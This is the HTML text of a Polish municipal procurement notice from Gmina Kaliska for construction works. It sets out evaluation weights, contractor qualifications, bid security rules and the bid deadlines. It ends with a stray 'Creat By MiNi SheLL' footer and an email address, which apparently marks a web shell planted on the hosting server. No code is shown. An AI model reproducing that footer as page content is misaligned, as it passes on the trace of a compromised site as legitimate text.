zakresie tego kryterium w skali punktowej<br/>do 30 pkt, na podstawie informacji podanych przez Wykonawcę<br/>w Formularzu Ofertowym, w którym jest zobowiązany wskazać okres,<br/>na jaki zamierza udzielić gwarancji w zakresie wykonanego przedmiotu zamówienia. W przypadku<br/>braku wskazania ww. okresu, Zamawiający uzna, że Wykonawca określił okres gwarancji na<br/>maksymalny termin 60 miesięcy.<br/>b) Wskazany okres gwarancji nie może być krótszy niż 24 miesiące,<br/>i nie dłuższy niż 60 miesięcy.<br/>3) Termin płatności faktury<br/>Termin płatności badanej oferty*<br/>T = ----------------------------------------------------------- x 100 x 10 %<br/>Oferta z najdłuższym terminem płatności<br/>*spośród wszystkich złożonych ofert niepodlegających odrzuceniu<br/>a) Oferta zostanie oceniona w zakresie tego kryterium w skali punktowej<br/>do 10 pkt, na podstawie informacji podanych przez Wykonawcę<br/>w Formularzu Ofertowym, w którym jest zobowiązany wskazać termin płatności faktury. W przypadku<br/>braku wskazania ww. terminu w formularzu ofertowym, Zamawiający uzna, że Wykonawca określił<br/>termin płatności faktury na maksymalny termin 30 dni.<br/>b) Wskazany termin płatności nie może być krótszy niż 14 dni i nie dłuższy<br/>niż 30 dni.<br/>3. Punktacja przyznawana ofertom w poszczególnych kryteriach oceny ofert będzie liczona z<br/>dokładnością do dwóch miejsc po przecinku, zgodnie z zasadami arytmetyki. 4. W toku badania i oceny ofert Zamawiający może żądać od Wykonawcy wyjaśnień dotyczących treści<br/>złożonej oferty, w tym zaoferowanej ceny.<br/>5. Zamawiający udzieli zamówienia Wykonawcy, którego oferta zostanie uznana<br/>za najkorzystniejszą.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">30</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Termin płatności faktury</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 5</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu na<br/>zasadach określonych w Rozdziale VIII SWZ, oraz spełniają określone przez Zamawiającego<br/>warunki udziału w postępowaniu.<br/>2. O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają warunki dotyczące:<br/>1) zdolności do występowania w obrocie gospodarczym – Zamawiający nie określa<br/>szczegółowego warunku w tym zakresie;<br/>2) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej,<br/>o ile wynika to z odrębnych przepisów – Zamawiający nie określa szczegółowego warunku w<br/>tym zakresie;<br/>3) sytuacji ekonomicznej lub finansowej – Zamawiający wymaga, aby Wykonawca<br/>w okresie prowadzenia robót ubezpieczony był od odpowiedzialności cywilnej<br/>w zakresie prowadzonej działalności związanej z przedmiotem zamówienia<br/>na kwotę nie mniejszą niż 500.000,00 zł<br/>4) zdolności technicznej lub zawodowej:<br/>a) zdolność zawodowa – Zamawiająca uzna, że Wykonawca spełnia warunek jeżeli wykaże, że<br/>dysponuje osobami odpowiedzialnymi za wykonanie zamówienia lub przedstawi pisemne<br/>zobowiązanie innych podmiotów<br/>do udostępnienia osób wykwalifikowanych, zdolnych do wykonania zamówienia, posiadających<br/>uprawnienia budowlane, upoważniające w świetle obowiązujących przepisów do kierowania i<br/>nadzorowania robotami budowlanymi; wymagane osoby to:<br/>• kierownik budowy – posiadający uprawnienia budowlane, kwalifikacje zawodowe do kierowania<br/>robotami budowlanymi bez ograniczeń<br/>w specjalności inżynieryjnej drogowej wydane na podstawie przepisów Prawa Budowlanego lub<br/>które zostały wydane na podstawie wcześniej obowiązujących przepisów lub odpowiadające im<br/>uprawnienia wydane obywatelom państw Europejskiego Obszaru Gospodarczego oraz<br/>Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo<br/>Budowlane oraz ustawy o zasadach uznawania kwalifikacji zawodowych nabytych w państwach<br/>członkowskich Unii Europejskiej, niezależnie od ilości części na które Wykonawca składa ofertę;<br/>poza osobą kierownika budowy, Wykonawca zapewni udział w realizacji niniejszego zamówienia<br/>niezbędnej ilości osób, posiadających wymagane kwalifikacje zawodowe, uprawnienia<br/>i wykształcenie jeżeli w trakcie realizacji niniejszego zamówienia,<br/>z uwagi na zakres przedmiotu zamówienia, wystąpi taka konieczność; wszystkie osoby<br/>wchodzące w skład personelu Wykonawcy muszą biegle władać językiem polskim, w<br/>przypadku, gdy którakolwiek z osób wchodzących w skład personelu Wykonawcy nie posiada<br/>biegłej znajomości języka polskiego, Wykonawca zobowiązany jest zapewnić na własny koszt,<br/>tłumacza dla potrzeb i na okres realizacji umowy; w przypadku wspólnego ubiegania się o<br/>zamówienie dwóch lub więcej Wykonawców – warunek można spełniać łącznie;<br/>b) doświadczenie Wykonawcy – Zamawiający uzna warunek za spełniony,<br/>jeśli Wykonawca wykaże, że zrealizował (zakończył) w okresie ostatnich 5 lat przed upływem<br/>terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, co<br/>najmniej jedno zamówienie o wartości nie mniejszej niż 500.000,00 zł brutto (potwierdzone<br/>dowodami, że roboty te zostały wykonane w sposób należyty oraz wskazujących, że roboty te<br/>zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo ukończone) o podobnym<br/>charakterze i złożoności co przedmiot niniejszego postępowania.<br/>3. Zamawiający może na każdym etapie postępowania, uznać że Wykonawca<br/>nie posiada wymaganych zdolności, jeżeli posiadanie przez Wykonawcę sprzecznych interesów,<br/>w szczególności zaangażowanie zasobów technicznych lub zawodowych Wykonawcy w inne<br/>przedsięwzięcia gospodarcze Wykonawcy może mieć negatywne wpływ na realizację<br/>zamówienia.<br/>4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty<br/>oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy w<br/>odniesieniu do warunków, które zostały opisane w rozdziale VII ust. 2 SWZ - zgodnie z treścią<br/>Formularza ofertowego. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1) oświadczenie Wykonawcy w zakresie art. 108 ust. 1 pkt 5 PZP o braku<br/>przynależności do tej samej grupy kapitałowej w rozumieniu ustawy<br/>z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów (Dz. U. z 2021 r., poz. 275 z późn. zm.)<br/>z innym Wykonawcą, który złożył odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do<br/>udziału w postępowaniu,<br/>albo oświadczenia o przynależności do tej samej grupy kapitałowej<br/>wraz z dokumentami lub informacjami potwierdzającymi przygotowanie ofert, oferty częściowej lub wniosku o dopuszczenie do udziału w postępowaniu niezależnie od innego Wykonawcy należącego do<br/>tej samej grupy<br/>kapitałowej – Załącznik nr 4 do SWZ;<br/>2) odpis lub informacja z Krajowego Rejestru Sądowego lub z Centralnej Ewidencji<br/>i Informacji o Działalności Gospodarczej, w zakresie art. 109 ust. 1 pkt 4 PZP, sporządzonych nie<br/>wcześniej niż 3 miesiące przed jej złożeniem, jeżeli odrębne przepisy wymagają wpisu do rejestru lub<br/>ewidencji;<br/>3) wykaz robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, porównywalnych z robotami budowlanymi<br/>stanowiącymi przedmiot zamówienia, wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i<br/>podmiotów,<br/>na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających czy te roboty<br/>budowlane zostały wykonane należycie,<br/>w szczególności informacji o tym czy roboty zostały wykonane zgodnie<br/>z przepisami prawa budowlanego i prawidłowo ukończone, przy czym dowodami, o których mowa, są<br/>referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były<br/>wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze Wykonawca nie jest w<br/>stanie uzyskać tych dokumentów – inne odpowiednie dokumenty – Załącznik nr 5 do SWZ;<br/>4) wykaz osób skierowanych przez Wykonawcę do realizacji przedmiotu zamówienia – dot. osoby która<br/>będzie pełnić funkcję kierownika budowy posiadającej uprawnienia upoważniające do kierowania<br/>robotami drogowymi w zakresie przedmiotu zamówienia (bez ograniczeń) zgodnie z Załącznikiem nr 6<br/>do SWZ;<br/>5) ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzenia działalności związanej z<br/>przedmiotem zamówienia na kwotę nie mniejszą niż 500.000,00 zł (wraz z potwierdzeniem opłacenia<br/>tego ubezpieczenia).</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości 8.000,00 zł.<br/>2. Wadium wnosi się przed upływem terminu składania ofert i utrzymuje nieprzerwanie do dnia<br/>upływu terminu związania ofertą, z wyjątkiem przypadków, o których mowa w art. 98 ust. 1 pkt 2<br/>i 3 oraz ust. 2 Pzp.<br/>3. Wadium może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących<br/>formach:<br/>a) pieniądzu,<br/>b) gwarancjach bankowych,<br/>c) gwarancjach ubezpieczeniowych,<br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z<br/>dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z<br/>2020 r., poz. 299 ze zm.).<br/>4. Wadium w formie pieniądza należy wnieść przelewem na konto w Banku Spółdzielczym w<br/>Skórczu – nr rachunku: 51 8342 0009 4000 0127 2000 0005 z dopiskiem „Wadium – nr<br/>postępowania ZP.271.12.2021”.<br/>Uwaga: Za termin wniesienia wadium w formie pieniężnej zostanie przyjęty termin uznania rachunku Zamawiającego.<br/>5. Wadium wnoszone w formie poręczeń lub gwarancji musi spełniać co najmniej poniższe<br/>wymagania:<br/>a) musi obejmować odpowiedzialność za wszystkie przypadki powodujące utratę wadium przez<br/>Wykonawcę określone w PZP, bez potwierdzania tych okoliczności,<br/>b) z treści powinno jednoznacznie wynikać zobowiązanie gwaranta do zapłaty całej kwoty<br/>wadium,<br/>c) powinno być nieodwołalne i bezwarunkowe oraz płatne na pierwsze żądanie,<br/>d) termin obowiązywania poręczenia lub gwarancji nie może być krótszy niż termin związania<br/>ofertą (z zastrzeżeniem iż pierwszym dniem związania ofertą jest dzień składania ofert),<br/>e) w treści poręczenia lub gwarancji powinna znaleźć się nazwa oraz numer przedmiotowego<br/>postępowania,<br/>f) beneficjentem poręczenia lub gwarancji jest Gmina Kaliska, ul. Nowowiejska 2, 83-260<br/>Kaliska,<br/>g) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (art. 58 PZP),<br/>Zamawiający wymaga aby poręczenie lub gwarancja obejmowała swą treścią (tj. zobowiązanych<br/>z tytułu poręczenia lub gwarancji) wszystkich Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia lub aby z jej treści wynikało, że zabezpiecza ofertę Wykonawców<br/>wspólnie ubiegających się o udzielnie zamówienia (konsorcjum),<br/>h) musi zostać złożone w postaci elektronicznej, opatrzone kwalifikowanym podpisem<br/>elektronicznym przez wystawcę poręczenia lub gwarancji.<br/>6. W przypadku wniesienia wadium w formie:<br/>a) pieniężnej – zaleca się, by dowód dokonania przelewu został dołączony do oferty,<br/>b) poręczeń lub gwarancji – wymaga się, by oryginał dokumentu został złożony wraz z ofertą.<br/>7. Oferta Wykonawcy, który nie wniesie wadium lub wniesie w sposób nieprawidłowy lub nie<br/>utrzyma wadium nieprzerwanie do upływu terminu związania ofertą lub złoży wniosek o zwrot<br/>wadium w przypadku, o którym mowa w art. 98 ust. 2 pkt 3 Pzp zostanie odrzucona.<br/>8. Zasady zwrotu oraz okoliczności zatrzymania wadium określa Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone do oferty.<br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, o którym mowa w rozdziale IX ust. 1 SWZ, składa każdy z Wykonawców. Oświadczenia te potwierdzają brak podstaw wykluczenia oraz spełnianie warunków udziału w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu.<br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy.<br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Wybrany Wykonawca jest zobowiązany do zawarcia umowy w sprawie zamówienia<br/>publicznego na warunkach określonych we Wzorze Umowy, stanowiącym<br/>Załącznik nr 7 do SWZ.<br/>2. Zakres świadczenia Wykonawcy wynikający z umowy jest tożsamy z jego zobowiązaniem<br/>zawartym w ofercie.<br/>3. Zamawiający przewiduje możliwość zmiany zawartej umowy w stosunku do treści wybranej<br/>oferty w zakresie uregulowanym w art. 454 – 455 PZP oraz wskazanym<br/>we Wzorze Umowy, stanowiącym Załącznik nr 7 do SWZ.<br/>4. Zmiana umowy wymaga dla swej ważności, pod rygorem nieważności, zachowania formy<br/>pisemnej.<br/>Szczegółowy rodzaj i zakres zmian umowy zawarty został w załączniku nr 7 do SWZ - Wzór<br/>Umowy <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2021-10-29 08:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://platformazakupowa.pl/pn/kaliska</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2021-10-29 08:05</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com